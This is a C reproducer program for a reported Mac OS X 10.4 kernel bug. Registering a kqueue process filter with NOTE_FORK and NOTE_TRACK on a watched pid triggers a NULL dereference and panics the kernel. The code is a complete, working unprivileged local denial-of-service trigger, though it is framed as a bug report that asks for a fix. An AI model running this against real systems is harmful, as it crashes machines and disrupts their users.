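/*
 * kqueue/EVFILT_PROC watcher -- minimal reproducer posted to the darwin-kernel
 * mailing list by B. S. N. Lakshmipathy.
 *
 * Reported problem: on the kernel shipped with 10.4.* (Tiger), registering a
 * process filter with NOTE_FORK | NOTE_TRACK on a process that then fork()s
 * panics the kernel. The reported call chain is
 *
 *   fork() -> fork1() -> knote() -> filt_proc() -> kevent_register() -> fp_lookup()
 *
 * where filt_proc() passes NULL as the third argument of kevent_register()
 * (bsd/kern/kern_event.c:501) and fp_lookup() in bsd/kern/kern_descrip.c
 * dereferences it without a NULL check. Because an ordinary user program
 * reaches this path, it is an unprivileged local denial of service against
 * any pid the caller is permitted to watch (EVFILT_PROC only needs the caller
 * to be allowed to see the target). The reporter's request: whoever
 * re-organized the kqueue/kevent code, please fix it.
 *
 * Usage: ./kqtrack <pid>
 * Prints a line for every fork of <pid> and for every child picked up through
 * NOTE_TRACK. Do not run this against a 10.4 kernel unless you intend to panic it.
 *
 * Fixes relative to the posted listing: the EV_SET() registration line that
 * the archive dropped is restored in its place; argc is checked against 2
 * (the original tested `argc < 1`, which is never true, so a missing argument
 * dereferenced argv[1]); the pid is parsed with strtol() instead of atoi();
 * <string.h> is included for memset/strerror; kevent ident/data are printed
 * with matching format widths instead of %d; EV_ERROR is reported; and the
 * watcher terminates once the target exits instead of blocking forever.
 */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/event.h>

/*
 * Parse a pid from the command line.
 * Returns the pid, or -1 when the argument is not a positive decimal integer
 * (atoi() would silently turn garbage into 0, and pid 0 is not a valid target).
 */
static pid_t parse_pid(const char *arg)
{
    char *end;
    errno = 0;
    long value = strtol(arg, &end, 10);
    if (end == arg || *end != '\0' || errno == ERANGE || value <= 0) {
        return -1;
    }
    return (pid_t)value;
}

/*
 * Entry point: watch <pid> through EVFILT_PROC and report fork/child events.
 * Returns EXIT_SUCCESS once the target exits, EXIT_FAILURE on a usage or
 * kqueue/kevent error (the original returned -1, which is not a portable
 * exit status).
 */
int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <pid>\n", argv[0]);
        return EXIT_FAILURE;
    }
    pid_t target = parse_pid(argv[1]);
    if (target < 0) {
        fprintf(stderr, "invalid pid: %s\n", argv[1]);
        return EXIT_FAILURE;
    }

    int kq = kqueue();
    if (kq < 0) {
        fprintf(stderr, "kqueue creation error: %s\n", strerror(errno));
        return EXIT_FAILURE;
    }

    /*
     * This is the registration from the report: NOTE_FORK | NOTE_TRACK is what
     * drives the kernel into the NULL dereference on 10.4. NOTE_EXIT is added
     * only so the watcher can stop once the target is gone rather than block
     * forever on a kqueue that will never fire again.
     */
    struct kevent change;
    EV_SET(&change, (uintptr_t)target, EVFILT_PROC, EV_ADD,
           NOTE_FORK | NOTE_TRACK | NOTE_EXIT, 0, NULL);
    if (kevent(kq, &change, 1, NULL, 0, NULL) < 0) {
        fprintf(stderr, "kevent set error: %s\n", strerror(errno));
        close(kq);
        return EXIT_FAILURE;
    }

    int rc = EXIT_SUCCESS;
    for (;;) {
        struct kevent ev;
        int n = kevent(kq, NULL, 0, &ev, 1, NULL);
        if (n < 0) {
            if (errno == EINTR) {
                continue;   /* signal interrupted the wait; not an error */
            }
            fprintf(stderr, "kevent get error: %s\n", strerror(errno));
            rc = EXIT_FAILURE;
            break;
        }
        if (n == 0) {
            continue;   /* cannot happen with a NULL timeout, kept for safety */
        }
        /* kqueue(2) reports per-event failures as EV_ERROR with errno in data. */
        if (ev.flags & EV_ERROR) {
            fprintf(stderr, "event error on pid %lu: %s\n",
                    (unsigned long)ev.ident, strerror((int)ev.data));
            continue;
        }
        if (ev.fflags & NOTE_FORK) {
            printf("%lu forked\n", (unsigned long)ev.ident);
        }
        /* For a NOTE_TRACK child, ident is the child pid and data the parent pid. */
        if (ev.fflags & NOTE_CHILD) {
            printf("child of %ld is %lu\n", (long)ev.data, (unsigned long)ev.ident);
        }
        if (ev.fflags & NOTE_TRACKERR) {
            printf("NOTE_TRACK error\n");
        }
        if (ev.fflags & NOTE_EXIT) {
            printf("%lu exited\n", (unsigned long)ev.ident);
            if (ev.ident == (uintptr_t)target) {
                break;   /* tracked children may still exist, but the watch target is gone */
            }
        }
    }
    close(kq);
    return rc;
}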
filt_proc() calls kevent_register() with NULL as its third argument (kern_event.c:501), and fp_lookup() then dereferences that pointer without checking it for NULL. Because any user process that can watch a pid can take this path, it is a local denial of service (kernel panic) that requires no privilege beyond being able to see the target process.